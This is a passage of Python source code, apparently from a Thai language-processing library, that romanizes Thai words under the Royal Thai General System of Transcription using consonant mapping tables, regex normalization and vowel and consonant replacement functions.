"ฝ": ["f", "p"],
"พ": ["ph", "p"],
"ฟ": ["f", "p"],
"ภ": ["ph", "p"],
"ม": ["m", "m"],
"ย": ["y", ""],
"ร": ["r", "n"],
"ฤ": ["rue", ""],
"ล": ["l", "n"],
"ว": ["w", ""],
"ศ": ["s", "t"],
"ษ": ["s", "t"],
"ส": ["s", "t"],
"ห": ["h", ""],
"ฬ": ["l", "n"],
"อ": ["", ""],
"ฮ": ["h", ""],
}
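# For example, "ข" maps to "kh" when used as an initial consonant and to "k"
# when used as a final (spelling) consonant.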
_THANTHAKHAT = "\u0e4c"
_RE_CONSONANT = re.compile(f"[{thai_consonants}]")
_RE_NORMALIZE = re.compile(
f"จน์|มณ์|ณฑ์|ทร์|ตร์|[{thai_consonants}]{_THANTHAKHAT}|"
f"[{thai_consonants}][\u0e30-\u0e39]{_THANTHAKHAT}"
# Paiyannoi, Maiyamok, Tonemarks, Thanthakhat, Nikhahit, other signs
r"|[\u0e2f\u0e46\u0e48-\u0e4f\u0e5a\u0e5b]"
)
def _normalize(word: str) -> str:
"""
    Remove silent (unpronounced) characters and tone marks.
    Strips karan (thanthakhat) clusters, paiyannoi, maiyamok, and tone marks.
"""
return _RE_NORMALIZE.sub("", word)
def _replace_vowels(word: str) -> str:
for vowel in _VOWELS:
word = re.sub(vowel[0], vowel[1], word)
return word
def _replace_consonants(word: str, consonants: str) -> str:
_HO_HIP = "\u0e2b" # ห
_RO_RUA = "\u0e23" # ร
_DOUBLE_RO_RUA = _RO_RUA + _RO_RUA
if not consonants:
return word
skip = False
mod_chars = []
j = 0 # j is the index of consonants
for i in range(len(word)):
if skip:
skip = False
j += 1
elif word[i] not in _CONSONANTS: # word[i] is not a Thai consonant.
mod_chars.append(word[i])
elif (
len(mod_chars) == 0 and word[i] == _HO_HIP and len(consonants) != 1
): # Skip HO HIP except that HO HIP is the only one consonant
j += 1
elif (
len(mod_chars) == 0
): # The first character must be an initial consonant.
mod_chars.append(_CONSONANTS[consonants[j]][0])
j += 1
elif word[i:] == _DOUBLE_RO_RUA: # Double RO RUA is in end of word
skip = True
mod_chars.append("a")
mod_chars.append("n")
j += 1
elif word[i : i + 2] == _DOUBLE_RO_RUA:
skip = True
mod_chars.append("a")
j += 1
else: # Assume that the rest are final consonants.
mod_chars.append(_CONSONANTS[consonants[j]][1])
j += 1
return "".join(mod_chars)
# support function for romanize()
def _romanize(word: str) -> str:
word = _replace_vowels(_normalize(word))
consonants = _RE_CONSONANT.findall(word)
# 2-character word, all consonants
if len(word) == 2 and len(consonants) == 2:
word = list(word)
word.insert(1, "o")
word = "".join(word)
word = _replace_consonants(word, consonants)
return word
def romanize(text: str) -> str:
"""Render Thai words in Latin alphabet, using RTGS
Royal Thai General System of Transcription (RTGS),
is the official system by the Royal Institute of Thailand.
:param text: Thai text to be romanized
:type text: str
:return: A string of Thai words rendered in the Latin alphabet
:rtype: str
"""
words = word_tokenize(text)
romanized_words = [_romanize(word) for word in words]
return "".join(romanized_words)
|